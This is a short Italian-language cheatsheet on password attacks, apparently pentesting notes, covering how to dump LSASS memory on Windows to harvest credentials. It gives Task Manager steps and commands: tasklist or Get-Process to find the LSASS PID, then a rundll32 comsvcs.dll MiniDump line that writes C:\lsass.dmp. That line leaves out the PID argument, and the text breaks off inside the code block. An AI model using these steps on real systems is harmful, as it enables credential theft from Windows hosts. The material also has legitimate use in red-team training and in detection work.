Password Attacks Cheatsheet

Password Attacks Cheatsheet¶

Attacking LSASS¶

LSASS (Local Security Authority Subsystem Service) è un servizio critico in Windows che gestisce l'autenticazione e memorizza le credenziali in memoria. Ecco alcune tecniche per attaccare LSASS e ottenere credenziali.

Dumping LSASS Process Memory¶

Metodo Task Manager
Con accesso a una sessione GUI interattiva:

1. Apri Task Manager: CTRL + SHIFT + ESC
2. Seleziona la scheda Processi
3. Trova e fai clic destro su "Local Security Authority Process" (lsass.exe)

4. Seleziona "Crea file di dump"

5. File Dump Salvato in: C:\Users\<user>\AppData\Local\Temp\lsass.DMP

Metodo Rundll32.exe & Comsvcs.dll
Usa un terminale per creare un dump di LSASS senza interfaccia grafica:

1. Trova il PID di LSASS:
2. Cmd: tasklist /svc | findstr lsass

3. PowerShell: Get-Process lsass

4. Crea il Dump con Rundll32.exe: ```powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump C:\lsass.dmp full